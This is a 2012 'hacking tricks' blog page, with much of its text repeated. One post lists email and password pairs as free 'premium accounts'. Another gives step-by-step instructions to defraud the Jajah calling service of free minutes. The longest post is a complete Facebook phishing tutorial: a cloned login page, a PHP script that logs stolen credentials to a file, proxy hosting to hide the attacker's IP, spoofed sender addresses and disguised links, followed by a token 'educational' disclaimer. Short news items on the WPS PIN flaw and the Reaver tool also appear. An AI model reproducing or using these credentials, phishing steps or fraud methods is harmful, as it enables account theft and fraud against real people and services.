hacking tricks
this blog shows latest hacking tips and tricks..
Sunday, 26 February 2012
UPLOADING Premium Accounts (27 Feb 2012)
USERNAME: onemore@2die4.com
PASSWORD: norelia
USERNAME: frank@goodimpressions.co.uk
PASSWORD: rowena
Monday, 9 January 2012
A chink in the armor of WPA/WPA2 WiFi security
Looks like your WiFi might not be quite as secure as you thought it was. A paper recently published by [Stefan Viehböck] details a security flaw in the supposedly robust WPA/WPA2 WiFi security protocol. It’s not actually that protocol which is the culprit, but an in-built feature called Wi-Fi Protected Setup. This is an additional security protocol that allows you to easily setup network devices like printers without the need to give them the WPA passphrase. [Stephan's] proof-of-concept allows him to get the WPS pin in 4-10 hours using brute force. Once an attacker has that pin, they can immediately get the WPA passphrase with it. This works even if the passphrase is frequently changed.
Apparently, most WiFi access points not only offer WPS, but have it enabled by default. To further muck up the situation, some hardware settings dashboards offer a disable switch that doesn’t actually do anything!
It looks like [Stephan] wasn’t the only one working on this exploit. [Craig] wrote in to let us know he’s already released software to exploit the hole.
Apparently, most WiFi access points not only offer WPS, but have it enabled by default. To further muck up the situation, some hardware settings dashboards offer a disable switch that doesn’t actually do anything!
It looks like [Stephan] wasn’t the only one working on this exploit. [Craig] wrote in to let us know he’s already released software to exploit the hole.
Friday, 6 January 2012
WPS PIN Vulnerability tools
Just a day after security researcher Stefan Viehbock released details of a vulnerability in the WiFi Protected Setup (WPS) standard that enables attackers to recover the router PIN, a security firm has published an open-source tool capable of exploiting the vulnerability. The tool, known as Reaver, has the ability to find the WPS PIN on a given router and then recover the WPA passphrase for the router, as well.
The vulnerability reported by Viehbock to US-CERT is related to the way that the WPS standard handles failed authentication attempts in some cases. In those scenarios, it will send back too much detailed information to the user--or attacker--about the PIN that's required to set up the router using WPS. Viehbock found that he was able to use that information to greatly reduce the amount of time it takes to recover the PIN for a router through a brute-force attack. Once the attacker has the WPS PIN, he can take control of the router.
Researchers at Tactical Network Solutions in Maryland on Wednesday released a tool called Reaver that implements an attack on the WPS vulnerability. The company released the tool as an open-source project on Google Code, but also is selling a more advanced commercial version.
"This is a capability that we at TNS have been testing, perfecting and using for nearly a year. But now that this vulnerability has been discussed publicly we have decided to announce and release Reaver, our WPS attack tool, to the open source community. Reaver is capable of breaking WPS pins and recovering the plain text WPA/WPA2 passphrase of the target access point in approximately 4-10 hours (attack time varies based on the access point)," the company said in a blog post.
The vulnerability in WPS affects a large number of routers from a variety of manufacturers, including Cisco, Buffalo, D-Link and others. The only real mitigation for the attack right now is for users to disable WPS. Viehbock said he hasn't received much in the way of response from vendors on the vulnerability.
Recommended Reads
The vulnerability reported by Viehbock to US-CERT is related to the way that the WPS standard handles failed authentication attempts in some cases. In those scenarios, it will send back too much detailed information to the user--or attacker--about the PIN that's required to set up the router using WPS. Viehbock found that he was able to use that information to greatly reduce the amount of time it takes to recover the PIN for a router through a brute-force attack. Once the attacker has the WPS PIN, he can take control of the router.
Researchers at Tactical Network Solutions in Maryland on Wednesday released a tool called Reaver that implements an attack on the WPS vulnerability. The company released the tool as an open-source project on Google Code, but also is selling a more advanced commercial version.
"This is a capability that we at TNS have been testing, perfecting and using for nearly a year. But now that this vulnerability has been discussed publicly we have decided to announce and release Reaver, our WPS attack tool, to the open source community. Reaver is capable of breaking WPS pins and recovering the plain text WPA/WPA2 passphrase of the target access point in approximately 4-10 hours (attack time varies based on the access point)," the company said in a blog post.
The vulnerability in WPS affects a large number of routers from a variety of manufacturers, including Cisco, Buffalo, D-Link and others. The only real mitigation for the attack right now is for users to disable WPS. Viehbock said he hasn't received much in the way of response from vendors on the vulnerability.
Recommended Reads
Wednesday, 4 January 2012
Sunday, 1 January 2012
Unlimited free call hack, India ,UK, Germany and Many more
It is free call, but with good quality . Please read it carefuly to fully understand and make free calls
Can anybody think to make it working from everywhere in the world?
Can anybody think to make it working from everywhere in the world?
This hack is about jajah, jajah is a leading VoIP provider, may be just after skype (I do not like skype, it is hell costly) It enables web-activated VOIP calls between two landline or mobile phones. Jajah offered five minutes free trail calls from many countries to many countries. with this hack you can convert this five mins of free trial calls to 50000 Minutes of free call. This hack has been tested from UK, India, Germany, If you do not live in UK, India or Germany, you have to check for your country, if it supports this hack, and write a comment so that I can update the list.
What you have to do to make Unlimited Free Calls.
1. Download firefox,
You need firefox to delete your cookies.2. Go to website http://www.jajah.com/call/trial
3. Type your number in My Phone Number,
4. Type the destination member, India or other countries, but I am sure for India.
5. Then make a call. :)
You need firefox to delete your cookies.2. Go to website http://www.jajah.com/call/trial
3. Type your number in My Phone Number,
4. Type the destination member, India or other countries, but I am sure for India.
5. Then make a call. :)
You will hear a voice message and your call will be connected.
After five mins of free trial call, your call will be disconnected automatically, now Follow these following steps
1. Delete your cookies, For firefox Goto Tools>>Options..>>Privacy>>Cookies and then check out (un select) the box "Allow sites to set cookies" and then press ok.2. Go to website http://www.jajah.com/call/trial
3. Type your number in My Phone Number,(add or change the additional digits after 5 mins)4. Type the destination member, India or other countries, but I am sure for India.
5. Then make a call. :)
3. Type your number in My Phone Number,(add or change the additional digits after 5 mins)4. Type the destination member, India or other countries, but I am sure for India.
5. Then make a call. :)
You will hear a voice message and your call will be connected. You can talk for another five mins, keep on deleting the cookie and changing the number and enjoy unlimited free calling.
If you still have the problem in making free trail calls, then read this blog completely and try to understand how it works, you can also leave a comment, I will reply asap.
Please read the description if you have problem in making calls
After clicking for your first call, first your phone will ring and once you pickup the phone, then a short message from jajah, and then your phoen will be connected. In this way you will get undisrupted five mins calls. After five mins, the call will be disconnected and you will not be able to place call anymore from the same phone number.
Why can you not change your number?
Jajah determines your IP and assign your country code. once you make a free trial call, jajah sets a cookie and your number is stored into computer memory that you can not change. Jajah also stores your number on the server, Now you can not make free trial call from your number that you used last time. If you try to make, it will give a message "You have used up your free minutes. Please register."
Hack:
To avoid this and make free call you need to do two things
1. Clean your cookie
2. Change your number.
How to delete cookies?You can do this thing with internet explorer, but I request you to download and install firefox so that you do not loose your stored information in internet explorer.
After download, first disable your cookies
For firefoxWhy can you not change your number?
Jajah determines your IP and assign your country code. once you make a free trial call, jajah sets a cookie and your number is stored into computer memory that you can not change. Jajah also stores your number on the server, Now you can not make free trial call from your number that you used last time. If you try to make, it will give a message "You have used up your free minutes. Please register."
Hack:
To avoid this and make free call you need to do two things
1. Clean your cookie
2. Change your number.
How to delete cookies?You can do this thing with internet explorer, but I request you to download and install firefox so that you do not loose your stored information in internet explorer.
After download, first disable your cookies
Goto Tools>>Options..>>Privacy>>Cookies and then check out (un select) the box "Allow sites to set cookies" and then press ok.
For Internet Explorer
Goto Tools>>Internet Options..>>In General tab you will see Browsing history now click on the delete button to delete the Cookies and history. (But you will loose your other stored information) then press ok.
Goto Tools>>Internet Options..>>In General tab you will see Browsing history now click on the delete button to delete the Cookies and history. (But you will loose your other stored information) then press ok.
(Please note that You have to delete cookie after each call)
By doing so, your number will not be stored into your PC.
How to change your number stored on the jajah server?
you can not change it but you can add additional digits to the number for eg, a If you have a landline number 1129876543 and if you add an additional digit to your number 11298765430, 1129876543123 or 112987654390059 it will ring the same phone because the first 10 digit of the phone is same. Doing so every time you make a call, jajah will recognize it as a new number.
By doing so, your number will not be stored into your PC.
How to change your number stored on the jajah server?
you can not change it but you can add additional digits to the number for eg, a If you have a landline number 1129876543 and if you add an additional digit to your number 11298765430, 1129876543123 or 112987654390059 it will ring the same phone because the first 10 digit of the phone is same. Doing so every time you make a call, jajah will recognize it as a new number.
Jajah supports 14-16 digit number of India, UK, Germany and many more country (try this If your country supports) but most of the telephone numbers are 10 digits only, If your number is 10 digit (for eg 1129876543 ) and if you add additional 4 digits at the end (11298765439999) the same phone will ring but the server will recognize as different number. So start with adding 0 at the end of your number and endup with the maximum supported digits for eg 999999, In this case you can me 5000000 Mins of free calls, seems to be unlimited.
All US number are restricted to 10 digits, so you can not add additional digit to your number, so the call is limited to 5 mins only.
Italian telephone numbers are with varying length and maximum supported length is 11 digit, but most of the telephone numbers are 10 digits so if you add 11th digit, you can make 11 calls of 5 mins each.
So, every time you finish your five minutes free trial call, start adding or changing the additional digits (from 0-999999 or to maximum supported length) to your number. In this way you can make unlimited free calls.
To make Unlimited free call repeat the procedure shown above
If you have another number, then your free talk time is doubled.
If you have any problem, please leave a comment, I will reply it asap. I am here to help you.
To make Unlimited free call repeat the procedure shown above
If you have another number, then your free talk time is doubled.
If you have any problem, please leave a comment, I will reply it asap. I am here to help you.
I request all of you to try this from your country and write a comment in both cases if it works or it doesn't work, so that everybody will come to know and will not waste time trying for their country. please write a comment
Enjoy free calling. Keep visiting this blog for more chap and free calling option and forward this blog to your friends.
Friday, 23 December 2011
How to Hack Facebook Account Using Phising webPage
Phishing WebPage:
Creating webpage which look like any site is described as Phishing. By creating Phishing WebPage, you can make users to believe that it is original website and enter their id and password.
Step 1:
Go to Facebook.com
Right click on the white space of the front page. Select "View Page source".
Copy the code to Notepad.
Step2:
Now find (Press ctrl +f) for "action=" in that code.
You fill find the code like this:
The big red ring that circles the action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html
Step 3:
Now we need to create the "next.php" to store the password. so open the notepad and type the following code:
save this file as "next.php"
Step 4:
open the notepad and just save the file as "pswrds.txt" without any contents.
Now upload those three files(namely index.html,next.php,pswrds.txt) in any of subdomain Web hosting site.
Note: that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com.
use this sites through the secure connection sites(so that you can hide your ip address) like: http://flyproxy.com . find best secure connection site.
Step 5:
create an mail account with facebook keyword like :FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_friends@gmail.com
Step 6 :
Copy the original Facebook friendship invitation and paste in your mail.
remove the hyperlink from this http:/www.facebook.com/n/?reqs.php
Mark it and push the Add hyperlink button
*Updated*
everyone asking doubts about this 6th step. You may get Facebook friendship invitation from Facebook when someone "add as a friend", right? Just copy that mail and paste in compose mail. In that content , you can find this link http:/www.facebook.com/n/?reqs.php . Just change the delete the link and create link with same text but link to your site.
Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page..
Note:
For user to believe change Your phishing web page url with any of free short url sites.
Like : co.nr, co.cc,cz.cc
This will make users to believe that it is correct url.
Creating webpage which look like any site is described as Phishing. By creating Phishing WebPage, you can make users to believe that it is original website and enter their id and password.
Step 1:
Go to Facebook.com
Right click on the white space of the front page. Select "View Page source".
Copy the code to Notepad.
Step2:
Now find (Press ctrl +f) for "action=" in that code.
You fill find the code like this:
The big red ring that circles the action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html
Step 3:
Now we need to create the "next.php" to store the password. so open the notepad and type the following code:
<php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
save this file as "next.php"
Step 4:
open the notepad and just save the file as "pswrds.txt" without any contents.
Now upload those three files(namely index.html,next.php,pswrds.txt) in any of subdomain Web hosting site.
Note: that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com.
use this sites through the secure connection sites(so that you can hide your ip address) like: http://flyproxy.com . find best secure connection site.
Step 5:
create an mail account with facebook keyword like :FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_friends@gmail.com
Step 6 :
Copy the original Facebook friendship invitation and paste in your mail.
remove the hyperlink from this http:/www.facebook.com/n/?reqs.php
Mark it and push the Add hyperlink button
*Updated*
everyone asking doubts about this 6th step. You may get Facebook friendship invitation from Facebook when someone "add as a friend", right? Just copy that mail and paste in compose mail. In that content , you can find this link http:/www.facebook.com/n/?reqs.php . Just change the delete the link and create link with same text but link to your site.
Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page..
Note:
For user to believe change Your phishing web page url with any of free short url sites.
Like : co.nr, co.cc,cz.cc
This will make users to believe that it is correct url.
Don't use this method for hacking others account. This article is for educational purpose only. Here is tips to prevent from Phishing Web page:
How to prevent from Phishing Web page?
How to prevent from Phishing Web page?
Subscribe to:
Posts (Atom)